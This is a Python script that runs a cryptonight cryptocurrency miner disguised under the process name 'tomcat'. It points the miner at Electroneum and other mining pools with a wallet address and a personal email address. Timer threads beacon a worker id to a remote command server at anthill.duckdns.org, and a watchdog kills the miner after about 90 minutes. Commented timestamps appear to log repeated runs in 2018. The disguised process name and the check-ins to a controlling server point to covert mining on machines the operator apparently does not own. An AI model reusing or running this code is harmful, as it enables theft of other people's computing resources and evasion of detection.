import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:07.802777
#2018-02-17 16:53:04.964098
#2018-02-17 18:43:04.343953
#2018-02-17 20:32:01.748565
#2018-02-17 22:18:03.876790
#2018-02-18 00:02:01.666414
#2018-02-18 01:52:03.615796
#2018-02-18 03:40:08.433699
#2018-02-18 05:27:06.769629
#2018-02-18 07:19:01.930898
#2018-02-18 09:06:05.978192
#2018-02-18 10:52:05.285859
#2018-02-18 12:39:03.318074
#2018-02-18 14:26:06.388679
#2018-02-18 16:16:06.580708
#2018-02-18 18:04:01.685008
#2018-02-18 19:50:07.597382
#2018-02-18 21:37:01.364389
#2018-02-18 23:25:02.893188
#2018-02-19 01:12:03.600865
#2018-02-19 02:57:07.055813
#2018-02-19 04:46:01.847834
#2018-02-19 06:29:06.072292
#2018-02-19 08:19:01.299057
#2018-02-19 10:08:01.950231
#2018-02-19 11:57:04.826224
#2018-02-19 13:44:05.450357
#2018-02-19 15:34:01.564184
#2018-02-19 17:21:06.211458
#2018-02-19 19:08:08.633539
#2018-02-19 20:54:06.967526
#2018-02-19 22:43:01.840003
#2018-02-20 00:26:08.144171
#2018-02-20 02:13:04.476119
#2018-02-20 04:04:01.435360
#2018-02-20 05:47:04.727432
#2018-02-20 07:33:06.384789
#2018-02-20 09:18:01.333837
#2018-02-20 11:02:08.384369
#2018-02-20 12:50:14.343344
#2018-02-20 14:35:06.676940
#2018-02-20 16:18:08.964626
#2018-02-20 18:04:09.898275
#2018-02-20 19:55:10.998676
#2018-02-20 21:44:04.073331
#2018-02-20 23:26:06.730428
#2018-02-21 01:09:07.489488
#2018-02-21 02:56:07.088016
#2018-02-21 04:44:01.725191
#2018-02-21 06:32:01.277034
#2018-02-21 08:17:06.722857
#2018-02-21 10:04:05.117865
#2018-02-21 11:53:01.506627
#2018-02-21 13:43:05.890078
#2018-02-21 15:29:05.356504
#2018-02-21 17:19:08.148467
#2018-02-21 19:08:05.919554
#2018-02-21 20:56:01.481498
#2018-02-21 22:42:03.091573
#2018-02-22 00:31:03.632384
#2018-02-22 02:19:03.591331
#2018-02-22 04:04:08.343370
#2018-02-22 05:50:05.914116
#2018-02-22 07:35:07.909240
#2018-02-22 09:23:02.092121
#2018-02-22 11:09:09.086229
#2018-02-22 12:55:01.368587
#2018-02-22 14:42:08.318215
#2018-02-22 16:27:01.813257
#2018-02-22 18:13:04.494223
#2018-02-22 20:03:07.370694
#2018-02-22 21:52:08.372516
#2018-02-22 23:38:16.614516
#2018-02-23 01:26:01.900664
#2018-02-23 03:12:06.202415
#2018-02-23 05:00:11.494163
#2018-02-23 06:45:01.740828
#2018-02-23 08:37:05.000743
#2018-02-23 10:52:09.051730
#2018-02-23 12:49:02.206219
#2018-02-23 14:33:01.650317
#2018-02-23 16:23:04.228137
#2018-02-23 18:11:01.367358
#2018-02-23 19:56:04.062404
#2018-02-23 21:41:04.959738
#2018-02-23 23:32:05.857797
#2018-02-24 01:21:01.283271
#2018-02-24 03:13:01.390474
#2018-02-24 04:58:01.821194
#2018-02-24 06:48:04.849491
#2018-02-24 08:40:06.582022
#2018-02-24 10:24:03.579859
#2018-02-24 12:19:01.691780
#2018-02-24 14:10:04.372632
#2018-02-24 15:57:04.929535
#2018-02-24 17:51:07.490803
#2018-02-24 19:38:01.258184
#2018-02-24 21:25:04.689469
#2018-02-25 00:05:06.501374
#2018-02-25 03:18:06.823613
#2018-02-25 06:04:03.518256
#2018-02-25 10:36:01.678935
#2018-02-25 12:09:01.297030
#2018-02-25 14:21:02.092736
#2018-02-25 15:56:01.600912